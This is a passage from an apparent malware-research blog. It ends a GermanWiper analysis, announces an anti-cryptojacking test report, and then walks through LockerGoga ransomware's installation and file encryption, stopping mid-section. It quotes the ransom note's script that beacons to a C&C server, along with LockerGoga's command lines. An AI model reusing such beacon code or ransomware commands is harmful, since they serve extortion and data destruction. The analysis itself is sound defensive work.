<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="276" src="https://lh4.googleusercontent.com/17PDXYSVcbhtn-bI-JeeEJkhciEkisgwciMsADdVNmsgZex1Pa3zfvDa0tElu6FQfn-syKONDT3aDtXQe_65VP9VA6aa30MhECBBRVvl-HHlJFK5UEA7cinUrfSLF4spzKa784E2" style="border: none;" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GermanWiper creates a jpg file and changes a desktop photo to that which tells to open the XXXXX_Entschluesselungs_Anleitung.html.</span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="353" src="https://lh3.googleusercontent.com/tfB06DRVZmVGCjH6C7QGuXQ_74IDEp0rF-qS5t1VbGxIqDR09LvmUgVnWdxDDhHeLO0e3JHHXzUeQbjFQ5ZZ3rShpvAtONe2IrpmobhyP6oFjoeirJ6f7QKUghaWx1UBZVFv2KPF" style="border: none;" width="624" /></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<h1 dir="ltr" style="line-height: 1.2; margin-bottom: 6pt; margin-top: 10pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Network communications</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">At the end of the HTML source code, the JavaScript code is located. It implements communication with the C&C server 'expandingdelegation.top'.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">When the HTML page is opened, the JavaScript code is executed.</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "arial"; font-size: 11pt; font-style: italic; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">“<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script>$( document ).ready(function() {$.get("hxxp://expandingdelegation.top/majis/c.php?status=start&ext=O6qkv&BRA=MURBa1YzbjNRWlp0WVpBbUdERkNReWFoN1lUQ1JETm1IMQ==&FCF=13257&FCS=699675323",function(data){});});</script></html>”</span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Total wiping</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Finally, the cmd script deletes volume shadow copies and disable Windows automatic startup repair.</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: white; color: #262626; font-family: "georgia"; font-size: 13.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="240" src="https://lh3.googleusercontent.com/WTzOyqCGeUPxLvGWBBvZOiZ34WM_-hPVnkQBv_BREfFjs-Gz9PoMoRZ4JE2sbAs1anQ9El_AgzDcGVg3X1BASiZTQcFXok3nhq9uhNPsIESlAj4S8c-rmkH80hvic-tfQ1SwJ9fs" style="border: none;" width="624" /></span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Conclusion</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">This is not the first case when, intentionally or due to a mistake, the ransomware was turned into a wiper but In this case targeting users in Germany. The case of GermanWiper shows that before paying the ransom, it makes sense for a victim first to contact cybersecurity laboratories or Police to verify if decryption is possible at all.</span></div>
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">IoCs</span></h1>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">expandingdelegation.top</span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SHA-256: 21c756af39c6a502f7ec173f0643389806912efc1947a93bd6618fe2dae58e39</span><br />
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span>
<br /></div>
<div>
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-23025338617827635652019-08-27T23:56:00.001-07:002019-08-28T00:05:53.593-07:00Anti-Cryptojacking Test - July 2019<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<div style="text-align: center;">
<span id="docs-internal-guid-188d0789-7fff-59b0-b1bf-df4301fd6ea9"><img height="300" src="https://lh6.googleusercontent.com/iqzb4VkXAnWdVghPMAIW0PpCoVuOd8djvMjOwPwzcMt09eERVrUfiWsqtFOasjs7gt47_dFVyEAllCsJzndkhQa5mryECVe8Jr_9CQ0Z948atX7UAWZSXNYvC2AftbxPhgN6M7lD" style="border: none;" width="400" /></span></div>
<br />
Cryptojacking or malicious cryptomining is a new type of threat that can be described as the unsolicited use of a user’s computing device to mine cryptocurrency. There are two types of cryptojacking attack: general-purpose and targeted. <br />
<a name='more'></a><br />
In a general-purpose attack, cryptominer is installed on the infected device typical as a result of a mass spam campaign that leveraged social engineering techniques to established a foothold on a victim’s machine. Alternatively, such attacks may end up in ransomware delivery. Typically, Trojan-Downloaders once executed on a user’s machine check for the number of CPU/GPUs and, if there are two or more of them, malware gives favor to the installation of cryptomining software.<br />
<div>
<br /></div>
<div>
For example:<br />
<ul style="text-align: left;">
<li>Jan 2018 - a malicious Monero cryptominer called Smominru (a.k.a. Ismo) spread using the EternalBlue exploit (CVE-2017-0144) and managed to earn 8,900 Monero which was an equivalent of approximately $3M.</li>
<li>Jan 2018 - Monero and Electroneum miners were distributed using RIG EK via the installation of SmokeLoader malware.</li>
<li>Feb 2018 - Trickbot, delivered through mass spam campaign, added the Monero cryptomining module.</li>
</ul>
On the contrary, in the case of a targeted attack, criminals search for ways to get access to corporate environments, mostly located in the cloud, with the high computational capacity to mine cryptocurrency at the expense of the compromised tenant. One of the common ways attackers get access to a corporate cluster in the cloud is searching for secrets such as keys, logins, and passwords that have been mistakenly published by engineers in configuration files to the public code repository services such as Github and Gitlab. Attackers use for that purpose the secrets crawlers, for example, TruffleHog. Another is scanning the Internet for exposed due to misconfiguration machines using the Shodan vulnerability and exposure scanning service. <br />
<br />
Examples of targeted cryptojacking attacks:<br />
<ul style="text-align: left;">
<li>Oct 2017 - A security flaw in Oracle’s WebLogic Server (CVE-2017-10271) allowed attackers to install miners at universities and research institutions.</li>
<li>Feb 2018 - Tesla's Amazon Web Services (AWS) account exposed, and hackers deployed cryptocurrency mining software called Stratum to mine cryptocurrency using the cloud's computing power.</li>
<li>Feb 2018 - CheckPoint said that attackers made more than $3 million by mining Monero on Jenkins exploiting CVE-2017-1000353.</li>
<li>Sep-Oct 2018 - The misconfiguration in Docker API led to deploying the Monero cryptominer at targets’ environments in China, the United States, France, Germany, and the United Kingdom.</li>
</ul>
Malicious cryptomining could be also run in the Internet Browser using the Coinhive API, which was recently shut down due to misuse. While this technique is not malicious itself, but running it without the user’s consent made it illegal. <br />
<br />
Therefore, we as well as many other security vendors consider cryptominers as Potentially Unwanted Software (PUS) and decided to test enterprise anti-malware solutions against them.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
Read the full report by <a href="https://github.com/AlexanderAda/NioGuardSecurityLab/raw/master/Test%20Reports/AntiCryptojacking%20Test%20-%20July%202019.pdf" target="_blank">the link</a>.</div>
</div>
Alexander Adamovhttp://www.blogger.com/profile/10336415028200154730noreply@blogger.com0tag:blogger.com,1999:blog-4482404627541610819.post-82066820931186888772019-03-23T15:08:00.000-07:002019-09-01T10:49:26.474-07:00Analysis of LockerGoga Ransomware<div dir="ltr" style="text-align: left;" trbidi="on">
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://upload.wikimedia.org/wikipedia/commons/7/7f/Rjukan_fabrikker_-_Norsk_Hydro.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="ÐаÑÑинки по запÑоÑÑ Norsk Hydro" border="0" src="https://upload.wikimedia.org/wikipedia/commons/7/7f/Rjukan_fabrikker_-_Norsk_Hydro.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
Norsk Hydro back in 1905. </div>
<div class="separator" style="clear: both; text-align: center;">
Source: https://commons.wikimedia.org/wiki/File:Rjukan_fabrikker_-_Norsk_Hydro.jpg</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
This week BleepingComputer <a href="https://www.bleepingcomputer.com/news/security/lockergoga-ransomware-sends-norsk-hydro-into-manual-mode/">reported</a> that LockerGoga ransomware was allegedly responsible for disrupting the Norsk Hydro's IT control system and forced the Norwegian industrial giant to switch to the manual operation mode. Later, according to <a href="https://motherboard.vice.com/amp/en_us/article/8xyj7g/ransomware-forces-two-chemical-companies-to-order-hundreds-of-new-computers">Motherboard</a>, this ransomware disrupted IT services of the two more US chemical companies Hexion and Momentive. Thus, it seems that the attackers behind LockerGoga target critical infrastructure and those mentioned above are not the only victims of the ransomware up to the moment. Further, we provide a detailed analysis of the ransomware encryption process.<br />
<div style="text-align: left;">
</div>
<a name='more'></a><br />
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Detection</span></h2>
Antivirus signature-based engines missed the LockerGoga sample supposedly because of the valid digital signature when it was first uploaded (March 8, 2019) to VirusTotal.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="173" src="https://lh6.googleusercontent.com/Qp9q6847-zfl8wxWjp-gf-mPiybNDZRw9nvOVojnHlYXofBO2kIcTRc6dNNCjPuBaza86rM_JHvCjWZ2BVUsEs7ILOaooxjZ9pCwGoifQtRwhp_T5P8gOvHLEIKwqYuSOkYA3J0G" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
Source: <a href="https://www.virustotal.com/en/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/analysis/1552049030/">https://www.virustotal.com/en/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/analysis/1552049030/</a><br />
<br />
Later, the certificate was revoked.<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="136" src="https://lh5.googleusercontent.com/PZc6tkOzVKHZa7nFgvR4DUvcH9Of5qm9OX8wbIJZLr1Mo_fMZDPm0-TwMYIYE81sWlzDaIIS3Q9eDYKbnXBD8kPvRkEQYk8x7OZxxGhvzrUd5CF1FZ77MxYCPDIcjY2P-aITa2pu" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<a href="https://www.virustotal.com/gui/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/detection" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;">https://www.virustotal.com/gui/file/eda26a1cd80aac1c42cdbba9af813d9c4bc81f6052080bc33435d1e076e75aa0/detection</span></a><span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"> </span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Static analysis</span></h2>
The binary contains statically-linked Boost and Crypto++ libraries that complicates the analysis of the ransomware, even though, obfuscation, packing, or code encryption were not used.<br />
<br />
The version 1320 has the following digital certificate issued to ‘ALISA LTD’ but revoked after the discovery of the attack. Other versions of LockerGoga were supplied with the certificates issued to Alina Ltd, Kitty's Ltd., Mikl Limited, and AB Simba Limited.<br />
<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="385" src="https://lh6.googleusercontent.com/_DMaEtt7w2yqiRAx-Jh5PpVG4IcfYJl28FAI4jhHnz2TYWpfEJlmcaYnyPgIlskJtkICQTf6ylWi-AZ2qulAsmdlJcTzHiln87sVZHi0NSabaoO7hH31jGTF0yRYw8u1lazlc3C1" style="border: none; transform: rotate(0rad);" width="290" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Installation</span></h2>
<br />
<br />
Once started, the cryptolocker copies itself to the %Temp% folder under the hardcoded name.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<br />
<blockquote class="tr_bq">
<i>C:\Windows\system32\cmd.exe /c move /y "C:\LockerGoga ransomware" C:\Users\<USER>\AppData\Local\Temp\yxugwjud<ID>.exe</i></blockquote>
After that, it executes the master process with the ‘-m’ key.</div>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Finding files for encryption</span></h2>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
The master process creates a list of files to be encrypted. The version 1320 of the cryptolocker does not perform filtering of the files based on extensions and encrypts all accessible files on disks.<br />
<span style="font-family: "arial"; font-size: 16pt; white-space: pre;"><br /></span> <span style="font-family: "arial"; font-size: 16pt; white-space: pre;">Interprocess Communication</span></div>
<br />
The master process sends a task to a worker through the named shared memory created with CreateFileMapping providing a path to file for encryption. The worker gets access to the master’s named shared memory by calling the function OpenFileMapping using the identifier ‘Global\SM-yxugwjud’.<br />
<br />
Then the master process starts workers with the parameter ‘-s’ also providing the identifier of the created named shared memory ‘-i Global\SM-yxugwjud’.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="background-color: white; color: black; font-family: "tahoma"; font-size: 12pt; vertical-align: baseline; white-space: pre;"><img src="https://lh5.googleusercontent.com/9eZiCCmbM9jxesXX11TXOrouTnGueA9Hpxg9c3UGR9Gq8VsdPG-V5XNA8pHdkJMKPYX4ZFMJPiE9jl3GW8Nsrch5dMD-mkonONd7Hp7wIkew_Z3b-aI_8MQqoEs7XqjI6Ecbb9ph" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<br />
For example:<br />
<br />
<div>
<blockquote class="tr_bq">
<i>C:\Users\<User>\AppData\Local\Temp\yxugwjud1342.exe -i Global\SM-yxugwjud -s</i></blockquote>
<h2 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Encryption</span></h2>
The cryptolocker adds ‘.locked’ extension. AES is used for file encryption in CTR streaming mode and key length of 128 bits. The file’s key and IV are encrypted with RSA-1024 using the MGF1(SHA-1) mask generation function for the OAEP padding scheme. The encrypted file key and IV are stored in the file footer.<br />
<div style="text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><img src="https://lh5.googleusercontent.com/vJTnKEkQSU1sUpCd5g_p-DenVpL8tZz97rXAliOsyWp9OtZ3SzlsICq2grGVlDjvI3a7NS7DYegiHcSEAPuF8brp95kfrMMsogQmfY-mq6ZlkS8NyBqEC8FiMo-8t9iKKQPV9doM" style="border: none; transform: rotate(0rad);" /></span></span></div>
<div style="text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"></span></div>
<div style="text-align: left;">
<span id="docs-internal-guid-68137098-7fff-92c0-c13a-66484c80deb0"><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;"><br /></span></span></div>
<div style="text-align: left;">
</div>
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: left;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">File operations</span></h3>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
The worker tries to open the file by the path given by the master. Then, it requests write permissions for the target file using the boost library.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="224" src="https://lh6.googleusercontent.com/W8aeN7hX_FPK84bLKWDuolikZhblv1gfbVQmVobOuwb-Rc9bB8zBNke3c7HXjJnYH-f344QjoIbqY3BEarYvYsiCN3KUiT-vKLhwUEZGOcWIGhyuCVORo0fXx3VX1tLjG17CgEFc" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<br />
It deletes the ‘.locked’ version of the file if it exists before encryption.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh5.googleusercontent.com/HWWs-GkT-b-vi9EUR4P71eYzkfDPrEMeh0oxDSBIBSb2dr1hinj2neM9IncBxpbSNr3D8IoJAdItupTZH8eHLYK16gJxsrptXnxMciFhNjdyCmwCPqvIC7jRpw1VtB9vwIWZiPb1" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="357" src="https://lh4.googleusercontent.com/GnFaz1Oui4RgNidz4kHNsZzHgGq76CumDyVHjQ92Y9MYOdW26zdfidLXssUhL2NxRLsgbRCRlm9NBpOqM0tOX0roy0xaHBoZS4iFajw9NZDfalxODdP-k_cGvCtdH5JN8nNfZT3x" style="border: none; transform: rotate(0rad);" width="574" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
After that, the worker renames a file to the one with the ‘.locked’ extension and starts encrypting the file content by 65,536-byte blocks.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="480" src="https://lh6.googleusercontent.com/yMNZaUGlwtIugsiIXORzc45MbrjfB3xymqbxOorn2GG2q6B3-t6wDLCDI1Kr0Qb5W6zl-aTtfPkdRuX6Q4R5a0ua0xP5Ub7Fel_TP3IZZq6MJXj2NmEXrYZX7f_xfB6Ik3RnXjws" style="border: none; transform: rotate(0rad);" width="608" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><span id="docs-internal-guid-1ece72fa-7fff-3360-4457-79d356937239"></span></span></div>
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">File encryption</span></h3>
<div>
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;"><br /></span></div>
For file content encryption LockerGoga uses AES in the stream mode CRT and key length of 128 bits.<br />
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The file key and IV are generated using Windows CryptGenRandom function.</span></div>
<span id="docs-internal-guid-84147652-7fff-70f1-9223-db91c8bb19a0"></span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><img height="209" src="https://lh5.googleusercontent.com/TNNfydTkgjix1x7J-exkayX-v5we60eXH-s-BHjv3RFV06JzN9LYUHMo3haI9G6mvT1m91_5p-qLi96_ifqbjtM7kqzL6pTydvttxP7YhIWsN4ojVKSisr1DU7eqCBulTQEE4UB1" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="529" /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;">Crypto++ enables AES-NI acceleration:</span></span></div>
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="336" src="https://lh6.googleusercontent.com/3cQghkQ_mzJHLAXogWG4AVmEiw2qpopnchCmVGHBQ_aiW177ZdRJ_FH4dSNi3D8YRPDluV4dAGWSOps9JCo5PYPU6BZWrZ9fxyCccyhJa2YQbWSzAF9Wpze5IaGwt1jXPUc47Jkk" style="border: none; transform: rotate(0rad);" width="438" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh4.googleusercontent.com/UPxGrKz7388xQgPyOXpXz24Psb4Skcfp7mbA-S7kvn6fKhMetc2REf9e_G_mzi2_b-U-8iaqu4ABWEPh_G55QOpQWvzR1E2WhgYtw3kqaS5Dc0UmYJcQ1G4JJ1Y78vt13wYvNJDw" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;">...</span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh3.googleusercontent.com/600xjYRZ1Egrx3-78_VHif9IXu6qcSXe7iL2PeFPElF8wWOx9uv5rHB97Ek-OeczT8A9KTuxe4SomC-MM3o61uTNCrKuEs1T903int6CJhrrEwji0-dfdiAeV4_40o1kx8Rb8538" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<h3 style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt; text-align: left;">
<span style="color: #434343; font-family: "arial"; font-size: 14pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Footer encryption</span></h3>
<div style="text-align: left;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre;"><br /></span></div>
During the initialization phase, the worker instantiates an RSAFunction object and loads the hardcoded public key (Modulus and Public exponent) in the PEM format.<br />
<br />
<img src="https://lh6.googleusercontent.com/fzX_pA0S6fbvVMpy_H3H7BnlHMbzMSyNV5p406ayDg3-BK-1aZSts-v6JEgF3hGpwECvNvv9plrLKgCWKHrYJM0VMnPexYwfiDepm1poakFKVR6IImc3VfzsDvQnkmb839kDWYlT" style="border: none; font-family: arial; font-size: 11pt; transform: rotate(0rad); white-space: pre;" /><br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img src="https://lh6.googleusercontent.com/KB1cN3BkYDrAQ58JIokQRCBOzkf7Z4hjSBkV0VT_SlTLr0L7ZBDGul5aHMNyD0k2g7sDP1PswgtxGbFY3RK7FM2tBuiUzdD27Qcg2gB5Tr1_SH00Kp-j1iS8mHVFFJ668SQi7WWw" style="border: none; transform: rotate(0rad);" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="245" src="https://lh5.googleusercontent.com/otCa7VJgK95OXe2oZCIdOJ-Nifzsm5WT_8s7gkyzi-d53ZghjVRr82MpklWHqoB0WxZa_tN2vtuAMRnNuatPHuh7lMQBgKGKjO_-N8LwxpKWtGL1Ff7_-UZaoDHYjlqoHJffUFFa" style="border: none; transform: rotate(0rad);" width="624" /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><br /></span></div>
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
<span style="color: black; font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre;"><img height="318" src="https://lh4.googleusercontent.com/L5W3kGwOGRNd_nMBCzadF-Sa0lnz8BZ_zHbbVoLLJB8fNxyrlwnwK0VhppHOtBFPSgBXs4W6JMpAxsrNJ0CBnHZXdkZynmN7aiDcZhkVsD6GFGMtqWIFcBTbzjNQlBwX0kykNaR-" style="border: none; transform: rotate(0rad);" width="493" /></span></div>
<div style="text-align: left;">
<span style="font-weight: normal;"><br /></span></div>
The cryptolocker uses RSA-1024 with the ‘MGF1(SHA-1)’ mask generation function for the OAEP padding scheme to encrypt 40 bytes buffer that contain first 4 zero bytes, 16-byte file IV, 16-byte file key, and the terminating 4-byte string “goga”.<br />
<br />
<div style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;">
